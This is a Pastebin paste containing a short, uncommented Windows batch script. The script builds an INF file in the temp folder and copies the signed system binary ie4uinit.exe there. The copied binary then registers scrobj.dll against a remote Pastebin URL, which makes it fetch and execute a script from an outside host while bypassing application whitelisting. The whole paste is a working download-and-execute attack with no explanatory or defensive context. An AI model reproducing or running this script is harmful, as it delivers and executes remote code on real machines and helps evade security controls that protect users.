Advertisement
rafelivgi

Untitled

Feb 28th, 2020
300
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. @echo off
  2. echo [version]>"%temp%\ieuinit.inf"
  3. echo signature="$CHICAGO$">>"%temp%\ieuinit.inf"
  4. echo >>"%temp%\ieuinit.inf"
  5. echo [DefaultInstall.Windows7]>>"%temp%\ieuinit.inf"
  6. echo RegisterOCXs=MSIE4RegisterOCX.Windows7>>"%temp%\ieuinit.inf"
  7. echo >>"%temp%\ieuinit.inf"
  8. echo [MSIE4RegisterOCX.Windows7]>>"%temp%\ieuinit.inf"
  9. echo %11%\scrobj.dll,NI,https://pastebin.com/raw/vr6xspN4>>"%temp%\ieuinit.inf"
  10. type "%windir%\System32\ie4uinit.exe" > "%temp%\ie4uinit.exe"
  11. "%temp%\ie4uinit.exe" -BaseSettings
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement